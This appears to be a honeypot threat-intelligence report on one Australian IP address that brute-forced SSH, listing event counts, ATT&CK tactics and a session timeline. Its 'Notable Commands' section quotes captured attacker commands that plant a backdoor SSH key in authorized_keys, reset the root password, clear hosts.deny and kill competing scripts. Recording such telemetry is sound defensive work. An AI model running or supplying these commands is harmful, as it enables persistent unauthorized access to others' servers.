203.221.12.133

Threat Confidence
50%
Location
🇦🇺 AU / Melbourne
ASN
AS7545 · TPG Telecom Limited
Cloud Provider
Total Events
273
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-01 23:28 — 2026-04-09 20:44
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Not flagged by any external feeds
Session Forensics
scanner ×18, malware_dropper ×7, credential_harvester ×11, opportunistic_bruter ×5
Sessions
41 (12 with login)
Avg Depth Score
0.39
Commands Executed
34
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:7ZKE8iSZ3st3"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • cat /proc/cpuinfo | grep model | grep name | wc -l
  • top
  • uname
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Scanner 9ef6c9c2ddd5 w4m_singapore_01 · 2026-04-10 14:57
15%
Malware Dropper 9c9760a6ce71 w4m_seattle_01 · 2026-04-09 20:44
3 1 1 100%
Opportunistic Bruter fb3e12476dd2 w4m_seattle_01 · 2026-04-09 20:44
1 50%
Credential Harvester bef9e4199f08 w4m_seattle_01 · 2026-04-09 20:44
1 35%
Credential Harvester 4681672dd588 w4m_seattle_01 · 2026-04-09 20:39
1 35%
Malware Dropper 352f04a3b059 w4m_seattle_01 · 2026-04-09 20:33
13 2 1 100%
Scanner 6dd6d10423fd w4m_seattle_01 · 2026-04-09 20:33
15%
Credential Harvester 35d8d4ad6cde w4m_seattle_01 · 2026-04-09 20:33
1 35%
Scanner 0dbf559b9035 w4m_seattle_01 · 2026-04-09 20:28
15%
Scanner 1622941f4141 w4m_seattle_01 · 2026-04-09 20:22
15%
Scanner e563666cf853 w4m_seattle_01 · 2026-04-09 20:17
15%
Scanner 93a16b6b9498 w4m_seattle_01 · 2026-04-09 20:11
15%
Credential Harvester 19883e83dc0f w4m_seattle_01 · 2026-04-09 20:06
1 35%
Credential Harvester 60ffe4a55e67 w4m_seattle_01 · 2026-04-09 20:01
1 35%
Scanner ef94dd4a4a79 w4m_seattle_01 · 2026-04-09 19:55
15%
Malware Dropper 4597c9740225 w4m_seattle_01 · 2026-04-09 19:50
6 2 1 100%
Scanner 0d27493aba64 w4m_seattle_01 · 2026-04-09 19:50
15%
Scanner 7397575bb264 w4m_seattle_01 · 2026-04-09 19:50
15%
Malware Dropper 1316b55e8d48 w4m_seattle_01 · 2026-04-09 19:44
3 1 1 100%
Opportunistic Bruter b634a8046fa3 w4m_seattle_01 · 2026-04-09 19:45
1 50%
Scanner c5bf2c382bdc w4m_seattle_01 · 2026-04-09 19:44
15%
Scanner d242f943db85 w4m_seattle_01 · 2026-04-09 19:39
15%
Scanner 4c031f0c54a6 w4m_seattle_01 · 2026-04-09 19:33
15%
Credential Harvester 3d4866ec8b1e w4m_seattle_01 · 2026-04-09 19:28
1 35%
Scanner 59a26378a784 w4m_seattle_01 · 2026-04-09 19:23
15%
Scanner d59756fa0d7a w4m_seattle_01 · 2026-04-09 19:17
15%
Credential Harvester 4ff0975b1f21 w4m_seattle_01 · 2026-04-09 19:12
1 35%
Credential Harvester 918663223a3c w4m_seattle_01 · 2026-04-09 19:06
1 35%
Scanner 8c2795a322c3 w4m_seattle_01 · 2026-04-09 19:01
15%
Scanner 7afc38cba8be w4m_seattle_01 · 2026-04-09 18:55
15%
Scanner a1efecc79be3 w4m_seattle_01 · 2026-04-09 18:50
15%
Opportunistic Bruter de76a71151c7 w4m_seattle_01 · 2026-04-09 18:44
1 50%
Malware Dropper 228974982756 w4m_seattle_01 · 2026-04-09 18:43
3 1 1 100%
Credential Harvester 56a643443dd6 w4m_seattle_01 · 2026-04-09 18:44
1 35%
Opportunistic Bruter b0918f78ed88 w4m_seattle_01 · 2026-04-09 18:38
1 50%
Malware Dropper 13de4d73ab07 w4m_seattle_01 · 2026-04-09 18:38
3 1 1 100%
Scanner 89c6090b33aa w4m_seattle_01 · 2026-04-09 18:38
15%
Credential Harvester b6ff476fc87a w4m_seattle_01 · 2026-04-09 18:30
1 35%
Opportunistic Bruter 577125ede761 w4m_seattle_01 · 2026-04-01 23:28
1 50%
Malware Dropper 73b515ec7e02 w4m_seattle_01 · 2026-04-01 23:28
3 1 1 100%
Credential Harvester 34c804fff3f4 w4m_seattle_01 · 2026-04-01 23:28
1 35%